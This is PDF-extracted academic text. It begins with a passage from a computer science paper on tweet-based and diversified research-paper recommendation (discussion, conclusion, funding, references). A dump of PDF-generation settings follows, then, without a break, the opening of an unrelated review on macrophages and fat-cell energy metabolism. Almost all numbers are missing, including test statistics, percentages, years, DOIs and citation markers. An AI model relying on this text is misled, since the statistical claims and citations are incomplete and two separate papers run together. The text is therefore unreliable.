https://peerj.com/computer-science/ impact of experimental factors in order to analyse the impact of each experimental factor, a three-way repeated measures anova was conducted. the mendoza test identified violations of sphericity for the following factors: firstly, user profile source × text mining method × ranking method (χ ( ) = . , p = . ); and secondly, text mining method × ranking method (χ ( ) = . , p = . ) (mendoza, ). thus, a three-way repeated measures anova was applied with a greenhouse-geiser correction of ε = . for the factors user profile source × text mining method × ranking method and ε = . for the factor text mining method × ranking method. table shows the results with the f-ratio, effect size η , and p-value. regarding the single factors, ranking method had the largest impact on srdp, as the effect size η indicates. for all the factors with significant differences, we applied a post-hoc analysis using shaffer’s msrb procedure. the results of the post-hoc analysis revealed that the strategies using ia-select resulted in higher srdp values when compared to those using cosine similarity. in addition, we observed a significant difference in the factors user profile source × ranking method and text mining method × ranking method. for both factors, post-hoc analyses revealed significant differences when a baseline was used in either of the two factors. when a baseline was used in one factor, |ue| became small unless a method other than a baseline was used in the other factor. discussion this section discusses the study’s results in relation to the two research questions. in turn, we review the results for the text mining method factor, which was found to have the largest influence on recommendation performance among the three factors. rq : do a user’s tweets generate serendipitous recommendations? regarding rq , the results of the experiment indicate that a user’s tweets do not improve the serendipity of recommendations. as shown in the rightmost column of table , tweets deliver unexpected recommendations to users, but only a small fraction of these are interesting to the users. this result is different from previous works. for instance, chen et al. ( ) observed the precision of a webpage recommender system based on table three-way repeated measures anova for srdp with greenhouse-geisser correction and f-ratio, effect size η , and p-value. the p-values are marked in bold font if p < . , which indicates a significant difference in a factor. factor f η p user profile source . . . text mining method . . . ranking method . . . user profile source × text mining method . . . user profile source × ranking method . . . text mining method × ranking method . . . user profile source × text mining m. × ranking m. . . . nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ user’s tweets was around . . in addition, lu, lam & zhang ( ) showed that a concept- based tweet recommender system based on user’s tweets achieves a precision of . . one way to account for this result is by drawing attention to the high probability that the users employed their twitter accounts for purposes other than professional, research-related ones. in particular, the users are likely to have used their twitter accounts to express private interests. we presume that taking private interests into consideration delivers serendipitous recommendations. this is because the recommender system will then suggest research papers that include both professional interests and private interests, and which are thus likely to be serendipitous. in the future, it may be helpful to introduce explanation interfaces for recommender systems (herlocker, konstan & riedl, ; tintarev & masthoff, ). the purpose of these explanation interfaces is to show why a specific item is being recommended to users, thereby enabling users to find a connexion between a recommended paper and their interests. rq : is it possible to improve a recommendation list’s serendipity through diversification? in terms of rq , the results indicate that the diversification of a recommendation list using the ia-select algorithm delivers serendipitous recommendations. this confirms results published elsewhere in the literature, which have found that ia-select improves serendipity (vargas, castells & vallet, ; vargas & castells, ). for instance, in the domain of movies and music, vargas & castells ( ) employed ia-select for recommender systems and confirmed that it provides unexpected recommendations. additionally, the iterative decrease of covered interests was associated with greater variety in recommender systems for scientific publications. furthermore, the experiment demonstrated that diversified recommendations are likely to be associated with greater utility for users. text mining methods among the three factors, the text mining method factor was associated with the most substantial impact on recommender system performance. in contrast to observations made in previous literature (goossen et al., ; nishioka & scherp, ), cf-idf and hcf-idf did not yield effective results. it is worth emphasising that this result could have been influenced by the quality of the knowledge graph used in this study (i.e. acm ccs), particularly in view of the fact that the performance of many text mining methods is directly informed by the quality of the knowledge graph (nishioka, große-bölting & scherp, ). another way to account for the poor outcomes relates to the variable of the knowledge graphs’ age. in particular, acm ccs has not been updated since , despite the fact that computer science is a rapidly changing field of inquiry. furthermore, relatively few concepts and labels were included in the knowledge base, which contrasts with the large number included in the knowledge graphs used in previous studies. for example, the stw thesaurus for economics used , concepts and , labels, respectively (nishioka & scherp, ). hence, the number of concepts and labels could have nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ influenced the quality of the knowledge graph and, in turn, the recommender system’s performance. in addition, while a previous study that used hcf-idf (nishioka & scherp, ) only drew on the titles of research papers, our study used both titles and abstracts to construct paper profiles and user profiles when a user’s own papers were selected as the user profile source. furthermore, since our study used sufficient information when mining research papers, we did not observe any differences among tf-idf, cf-idf, and hcf-idf, which can include related concepts. finally, as with any empirical experiment, data triangulation is needed before generalising any of the conclusions drawn in this paper. therefore, further studies of recommender systems in other domains and similar settings should be conducted. in this article, we used only textual information in tweets. we did not use contents from urls mentioned in tweets, images, and videos. we observed that tweets by subjects contain on average . urls (sd: . ). in the future, we would like to take these contents into account, as abel et al. ( ) did. threats to validity in this article, we only considered the domain of computer science. in other domains, the results and findings might be different. in the future, we would like to conduct studies in other domains such as biomedical science using medline and social science, economics. in addition, the results shown in this article may potentially be influenced by the number of subjects we recruited. finding significances with few subjects is harder than with many subjects. however, we observed several significances and measured the effect sizes. we assume that adding more subjects would bring almost no additional insights. as noted in the related work, this study evaluates serendipity of recommendations focusing on “unexpectedness to be found” and “unexpectedness to be recommended”. this is motivated by our library setting, where we assume researchers are working on research papers and like to receive recommendations for literature that they have not found yet (vagliano et al., ). referring to the other variations of serendipity as proposed by kotkov et al. ( ), like “unexpectedness to be relevant” and “implicit unexpectedness”, we leave them for future studies. conclusion the purpose of this study’s online experiment was to determine whether tweets and the ia-select algorithm have the capability to deliver serendipitous research paper recommendations. the results revealed that tweets do not improve the serendipity of recommendations, but ia-select does. we anticipate that this insight will contribute to the development of future recommender systems, principally because service providers and platform administrators can use the data presented here to make more informed design choices for the systems and services developed. the data from this experiment are publicly available for further study and reuse (https://doi.org/ . /zenodo. ). nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was supported by the eu h project moving (no. ), the jsps grant-in-aidfor scientific research (s) (no. h ), and the jsps grant-in-aid for young scientists (no. k ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: eu h project moving: . jsps grant-in-aid for scientific research (s): h . jsps grant-in-aid for young scientists: k . competing interests the authors declare that they have no competing interests. author contributions � chifumi nishioka conceived and designed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � jörn hauke conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. � ansgar scherp conceived and designed the experiments, analysed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the data is available at zenodo: nishioka, chifumi, scherp, ansgar, & hauke, jörn. ( ). experimental result to investigate the influence of user's tweets and diversification on serendipitous research paper recommendations [data set]. zenodo. doi . /zenodo. . references abel f, gao q, houben g-j, tao k. . semantic enrichment of twitter posts for user profile construction on the social web. in: extended semantic web conference. springer, – . abel f, herder e, krause d. . extraction of professional interests from social web profiles. in: international conference on user modeling, adaptation and personalization (umap). achakulvisut t, acuna de, ruangrong t, kording k. . science concierge: a fast content-based recommendation system for scientific publications. plos one ( ):e doi . /journal.pone. . nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ agrawal r, gollapudi s, halverson a, ieong s. . diversifying search results. in: proceedings of the second acm international conference on web search and data mining. new york: acm, – . bai x, wang m, lee i, yang z, kong x, xia f. . scientific paper recommendation: a survey. ieee access : – doi . /access. . . beel j, gipp b, langer s, breitinger c. . research-paper recommender systems: a literature survey. international journal on digital libraries ( ): – doi . /s - - - . bostandjiev s, o’donovan j, höllerer t. . taste-weights: a visual interactive hybrid recommender system. in: proceedings of the sixth acm conference on recommender systems. new york: acm. carbonell jg, goldstein j. . the use of mmr, diversity-based reranking for reordering documents and producing summaries. in: proceedings of the st annual international acm sigir conference on research and development in information retrieval. new york: acm, – doi . / . . chen j, nairn r, nelson l, bernstein m, chi e. . short and tweet: experiments on recommending content from information streams. in: proceedings of the sigchi conference on human factors in computing systems. new york: acm. collins am, loftus ef. . a spreading-activation theory of semantic processing. psychological review ( ): – doi . / - x. . . . feng w, wang j. . we can learn your# hashtags: connecting tweets to explicit topics. in: ieee th international conference on data engineering. ieee, – . ge m, delgado-battenfeld c, jannach d. . beyond accuracy: evaluating recommender systems by coverage and serendipity. in: proceedings of the fourth acm conference on recommender systems. new york: acm, – . goossen f, ijntema w, frasincar f, hogenboom f, kaymak u. . news personalization using the cf-idf semantic recommender. in: proceedings of the international conference on web intelligence, mining and semantics. new york: acm. herlocker jl, konstan ja, riedl j. . explaining collaborative filtering recommendations. in: proceedings of the acm conference on computer supported cooperative work. new york: acm, – . herlocker jl, konstan ja, terveen lg, riedl j. . evaluating collaborative filtering recommender systems. acm transactions on information systems (tois) ( ): – doi . / . . kapanipathi p, jain p, venkataramani c, sheth a. . user interests identification on twitter using a hierarchical knowledge base. in: european semantic web conference. berlin: springer. kaya b. . user profile based paper recommendation system. international journal of intelligent systems and applications in engineering ( ): – doi . /ijisae. . kotkov d, konstan ja, zhao q, veijalainen j. . investigating serendipity in recommender systems based on real user feedback. in: proceedings of the rd annual acm symposium on applied computing. – . kotkov d, veijalainen j, wang s. . how does serendipity affect diversity in recommender systems? a serendipity-oriented greedy algorithm. computing ( ): – doi . /s - - - . nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /ijisae. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kotkov d, wang s, veijalainen j. . a survey of serendipity in recommender systems. knowledge-based systems : – doi . /j.knosys. . . . letierce j, passant a, breslin jg, decker s. . understanding how twitter is used to spread scientific messages. in: the web science conference , at raleigh, nc, usa. lops p, de gemmis m, semeraro g. . content-based recommender systems: state of the art and trends. in: ricci f, rokach l, shapira b, kantor p, eds. recommender systems handbook. boston: springer, – . lu c, lam w, zhang y. . twitter user modeling and tweets recommendation based on wikipedia concept graph. in: workshops at the twenty-sixth aaai conference on artificial intelligence. mcnee sm, riedl j, konstan ja. . being accurate is not enough: how accuracy metrics have hurt recommender systems. in: chi’ extended abstracts on human factors in computing systems. new york: acm, – . mendoza jl. . a significance test for multisample sphericity. psychometrika ( ): – . middleton se, shadbolt nr, de roure dc. . ontological user profiling in recommender systems. acm transactions on information systems (tois) ( ): – doi . / . . nascimento c, laender ahf, da silva as, gonçalves ma. . a source independent framework for research paper recommendation. in: proceedings of the th annual international acm/ieee joint conference on digital libraries. new york: acm, – . nishioka c, große-bölting g, scherp a. . influence of time on user profiling and recommending researchers in social media. in: proceedings of the th international conference on knowledge technologies and data-driven business. new york: acm doi . / . . nishioka c, scherp a. . profiling vs. time vs. content: what does matter for top-k publication recommendation based on twitter profiles? in: proceedings of ieee/acm joint conference on digital libraries. new york: acm, – . orlandi f, breslin j, passant a. . aggregated, interoperable and multi-domain user profiles for the social web. in: proceedings of the th international conference on semantic systems. new york: acm, – doi . / . . salton g, buckley c. . term-weighting approaches in automatic text retrieval. information processing & management ( ): – . shaffer jp. . modified sequentially rejective multiple test procedures. journal of the american statistical association ( ): – . shani g, gunawardana a. . evaluating recommendation systems. in: ricci f, rokach l, shapira b, kantor p, eds. recommender systems handbook. boston: springer, – . shen w, wang j, luo p, wang m. . linking named entities in tweets with knowledge base via user interest modeling. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – doi . / . . sugiyama k, kan m-y. . scholarly paper recommendation via user’s recent research interests. in: proceedings of the th annual joint conference on digital libraries. new york: acm, – doi . / . . sugiyama k, kan m-y. . towards higher relevance and serendipity in scholarly paper recommendation. acm sigweb newsletter (winter): . nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.knosys. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tang j, zhang j, yao l, li j, zhang l, su z. . arnetminer: extraction and mining of academic social networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . tintarev n, masthoff j. . effective explanations of recommendations: user-centered design. in: proceedings of the acm conference on recommender systems. new york: acm, – . uchiyama k, nanba h, aizawa a, sagara t. . osusume: cross-lingual recommender system for research papers. in: proceedings of the workshop on context-awareness in retrieval and recommendation. new york: acm, – . vagliano i, gunther f, heinz m, apaolaza a, bienia i, breitfuss g, blume t, collyda c, fessl a, gottfried s, hasitschka p, kellermann j, kohler t, maas a, mezaris v, saleh a, skulimowski amj, thalmann s, vigo m, wertner a, wiese m, scherp a. . open innovation in the big data era with the moving platform. ieee multimedia ( ): – doi . /mmul. . . vargas s, castells p. . rank and relevance in novelty and diversity metrics for recommender systems. in: proceedings of the fifth acm conference on recommender systems. new york: acm, – . vargas s, castells p, vallet d. . intent-oriented diversity in recommender systems. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . vargas s, castells p, vallet d. . explicit relevance models in intent-oriented information retrieval diversification. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . wu y, liu y, chen f, zhang m, ma s. . beyond greedy search: pruned exhaustive search for diversified result ranking. in: proceedings of the acm sigir international conference on theory of information retrieval. new york: acm, – . ziegler c-n, mcnee sm, konstan ja, lausen g. . improving recommendation lists through topic diversification. in: proceedings of the th international conference on world wide web. new york: acm, – . nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /mmul. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ influence of tweets and diversification on serendipitous research paper recommender systems introduction related work experimental factors evaluation results discussion conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice : r –r m keuper inflammatory control of adipocyte bioenergetics review on the role of macrophages in the control of adipocyte energy metabolism michaela keuper department of molecular biosciences, the wenner-gren institute, stockholm university, stockholm, sweden correspondence should be addressed to m keuper: michaela.keuper@su.se abstract the crosstalk between macrophages (mΦ) and adipocytes within white adipose tissue (wat) influences obesity-associated insulin resistance and other associated metabolic disorders, such as atherosclerosis, hypertension and type diabetes. mΦ infiltration is increased in wat during obesity, which is linked to decreased mitochondrial content and activity. the mechanistic interplay between mΦ and mitochondrial function of adipocytes is under intense investigation, as mΦ and inflammatory pathways exhibit a pivotal role in the reprogramming of wat metabolism in physiological responses during cold, fasting and exercise. thus, the underlying immunometabolic pathways may offer therapeutic targets to correct obesity and metabolic disease. here, i review the current knowledge on the quantity and the quality of human adipose tissue macrophages (atmΦ) and their impact on the bioenergetics of human adipocytes. the effects of atmΦ and their secreted factors on mitochondrial function of white adipocytes are discussed, including recent research on mΦ as part of an immune signaling cascade involved in the ‘browning’ of wat, which is defined as the conversion from white, energy-storing adipocytes into brown, energy- dissipating adipocytes. introduction white adipose tissue (wat) is a metabolically active tissue that modifies systemic metabolism significantly by regulating the storage and release of lipids. free fatty acids serve as a major fuel source during times of energy scarcity and high energy demands, such as exercise, cold exposure and immune responses. the dysregulation of fatty acid release contributes to dyslipidemia, resulting in ectopic fat deposition into various organs. ectopic fat in turn impairs organ functionality, as seen during many metabolic diseases. importantly, wat also releases metabolites other than fatty acids (e.g. lactate as glycolytic end-product) ( ). beyond the direct metabolic effects, wat also mediates endocrine crosstalk by secretion of various adipokines (e.g. adiponectin and leptin) ( , ). the crucial role of mitochondrial activity for wat function is well established and impacts the capacity of lipid storage ( , ) and secretory function ( , , ). clinical studies substantiate the strong association between decreased mitochondrial content and oxygen consumption of wat/adipocytes, which is in particular evident during metabolic complications such as insulin resistance, type diabetes (t dm) and cardiovascular diseases ( , , , , ). a crucial hallmark in the development of obesity-associated metabolic disorders is the chronic, low-grade inflammation of wat ( , ). although obesity-associated inflammation and macrophage (mΦ) infiltration affect many tissues (such as liver, muscle, brain and pancreas ( , , , , )), the infiltration into wat is disproportionately increased. notably, it has been suggested that the obesity-associated inflammation of human wat compromises mitochondrial function ( , , , ). adipose tissue macrophages (atmΦ) also reside in the wat of lean and healthy individuals, suggesting a - - key words f inflammation f oxidative phosphorylation f glycolysis f cellular energy metabolism f obesity f diabetes endocrine connections ( ) , r –r id: - this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:michaela.keuper@su.se https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : fundamental physiological role for atmΦ, beyond the context of pathology (fig.  ). some inflammatory processes appear to be important for healthy wat expansion ( ). the atmΦ-secreted cytokines and chemokines act in an autocrine and paracrine manner, the latter by controlling the inflammatory response of other immune cells or possibly impacting the metabolism of adjacent adipocytes. recent mouse studies suggest the secretion of atmΦ factors that metabolically enhance adipocytes during cold, stress and exercise ( , , ), which has been broadly termed the ‘browning’ of wat. some mechanistic aspects of mΦ-induced browning have been questioned ( , ), but most studies collectively support a role for mΦ in the energy metabolism of adipocytes, in particular controlling adipocyte mitochondrial function ( , , , , , ). taken together, there is accumulating evidence that atmΦ enhances or suppresses the mitochondrial function in wat. the understanding of how adipocyte energy metabolism and mitochondria are regulated during physiological and pathophysiological adaptation requires the mechanistic understanding of the immunometabolic interaction between atmΦ and adipocytes. the molecular networks of this interaction may offer potential interference points to correct imbalanced metabolism during pathological situations such as obesity and t dm. adipose tissue macrophages (atmΦ) mΦ number increases in human white adipose tissue during obesity atmΦ are numerically the dominant type of immune cells in human wat, and obesity further enhances mΦ numbers in wat, which contributes to obesity-related immune imbalances (fig.  a). however, the data on the figure  obesity-associated impaired immune balance in white adipose tissue. (a) obesity is associated with an impaired immune balance toward pro- inflammatory in wat. all fat depots are affected, but mostly the viscwat. (b) atmΦ amount is low in lean scwat (~ % of svf). however, mΦ are numerically the dominant type of immune cells representing half of the immune cells. mΦ increase in obese wat, for example in human scwat from to % of the svf ( ). (c) the roles of atmΦ in lean (left) and obese (right) wat. the number of mΦ is low and they are interspersed between adipocytes in wat of lean subjects, contrasting the higher number and local accumulation of mΦ in crown-like structures during obesity, which is fostered by proliferation, high immigration and low emigration. the low inflammatory profile (surface markers, cytokine expression and secretion, e.g. il , il ) in lean subjects transforms into higher inflammatory status (e.g. tnfα, il , il β) during obesity. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r : cellular composition of wat (and thus the amount of atmΦ) vary quantitatively between studies, depending on donor, fat depot, wat isolation/processing method and molecular readout. the relative amount of mΦ varies from as little as ≤ % (cd c+ cells, immunohistochemistry) in lean human scwat ( ), to up to % in obese scwat, as seen in the first report from weisberg et al. (cd + cells, immunohistochemistry) ( ). the recent publication from ehrlund et  al. found that the stromal vascular fraction (svf) of scwat from lean donors consists of ~ % progenitors including preadipocytes, ~ % endothelial cells, ~ % immune cells (and an undetermined rest) ( ) (fig.  b). half of this immune cell population is represented by mΦ (cd +/cd + cells), whereas the other half is represented by t cells, b cells, mast cells, neutrophils and eosinophils. this study also reports that mΦ content significantly increases during obesity to ~ % of svf in scwat ( ). the identified numbers of ~ % mΦ in lean scwat and ~ % in obese scwat (fig.  b) agree well with other reports ( , , , , , , , , , , ). several publications show increased mΦ numbers in wat during obesity that are more pronounced in viscwat than in scwat ( , , ). the atmΦ numbers in both viscwat and scwat correlate with bmi ( , , ). although atmΦ increase significantly in viscwat during obesity, a recent publication also notes that the relative contribution of mΦ to the svf is much smaller in viscwat (lean: %; obese: %) as compared to scwat ( ). comparing immune cell populations in viscwat from lean, middle-aged, male mice to cynomolgus macaques and healthy humans revealed that mΦ are the dominant immune cell type in murine viscwat, whereas in humans and cynomolgus macaques, t cells dominate, followed by mΦ as the second largest immune cell population ( ). considering these cross-species comparisons, mΦ may not always be the most abundant immune cell type in adipose tissue. nevertheless, mΦ are present in scwat and viscwat with increasing numbers during obesity. furthermore, the obese condition alters their quality, comprising the mode of activation and the diversity of the secretome. the local accumulation of atmΦ in obese wat excessive energy intake (overnutrition) is broadly accepted as an inducer of increased atmΦ infiltration in obese wat, causing adipocyte hypertrophy and hypoxia, eventually leading to adipocyte dysfunction, cell death and fibrosis. this scenario is accompanied by higher levels of chemoattractant cytokines such as chemokine (c-c motif) ligand (ccl /mcp- ), chemokine (c-c motif) ligand (ccl /mip a) and others. these cytokines provide a chemotactic gradient that attracts monocytes into wat ( , , , ). inside wat, monocytes enhance the chemotactic gradient by secreting their own chemokines, thereby attracting additional mΦ and setting up a feed-forward inflammatory process. between lean and obese, not only the number of mΦ changes, but also their localization: in lean wat, atmΦ are interstitially spaced, contrasting the local accumulation of atmΦ in so-called ‘crown-like structures’ around dead, apoptotic adipocytes and/or fibrotic areas in obese wat ( , , ). mouse studies indicate that the increased mΦ content in obese wat presumably results from several processes: higher rates of recruited/infiltrating monocytes (e.g. via ccl , see above) ( , , ), proliferation of wat- resident monocytes ( , ) and lower emigration rates of atmΦ out of obese wat (e.g. via netrin ) ( ). the physiological importance of dynamic atmΦ for wat biology atmΦ exert distinct physiological roles and beneficial effects on wat homeostasis, for example, healthy lipid storage ( , , , , ) (fig.  c). atmΦ are dynamic cells and they quickly adapt their phenotype and metabolism to changing environments, for example during fasting- induced wat lipolysis ( , ) and overnutrition ( ). atmΦ stimulate healthy lipid storage and therefore prevent adverse ectopic lipid storage in other organs (e.g. hepatic steatosis). anti- and pro-inflammatory signals seem to be involved in maintaining wat homeostasis: healthy wat expansion is impaired by ablating tissue- resident atmΦ (anti-inflammatory m ) ( ) or reducing pro-inflammatory signals in murine wat ( ). recently, atmΦ function has been implicated in cold adaptation and exercise of mice ( , ). il -activated mΦ appear to be part of an anti-inflammatory signaling cascade contributing to cold-induced browning and recruitment of beige adipocytes in scwat ( , , , , , ). the underlying molecular mechanisms, however, and some of the reported effects have been controversially discussed ( , ). the potential role of atmΦ in browning will be detailed in later sections. atmΦ display a mixed phenotype in obese wat one of the first studies investigating atmΦ proposed a phenotypic switch during obesity: while resident m -like atmΦ dominate in lean wat, pro-inflammatory (m ) this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m keuper inflammatory control of adipocyte bioenergetics r pb–r : atmΦ dominate in obese wat ( ). the stressed, obese wat is marked by elevated levels of fatty acids and lps, which can activate tlr signaling to polarize mΦ toward the pro-inflammatory m phenotype ( ). thus, atmΦ can resemble the phenotype of lps and ifnγ-activated mΦ during diet-induced obesity ( , , ). this simplified classification of anti- (m ) vs pro- (m ) inflammatory activated mΦ, however, does not reflect the actual situation in vivo, where a spectrum of mixed markers is found ( ). notably, there are also species differences on the molecular level between human and murine atmΦ. for example, the markers commonly used for murine mΦ polarization, such as inducible nitric oxide synthase (inos) and arginase (arg ), are barely expressed in human atmΦ ( , , , ). recently, several different atmΦ subtypes have been identified in obese human wat expressing macrophage activation markers of both the m spectrum (e.g. cd c) and the m spectrum (e.g. cd , cd ) ( , , , , ). additionally, human atmΦ displaying m surface markers are capable of secreting both, pro- and anti-inflammatory cytokines ( ). cd c+-atmΦ show a reduced pro-inflammatory profile after weight loss ( ). thus, in particular during obesity, atmΦ cannot be classified using the simple dual m /m model. a new category of mΦs, termed ‘metabolically’ activated mΦ, was 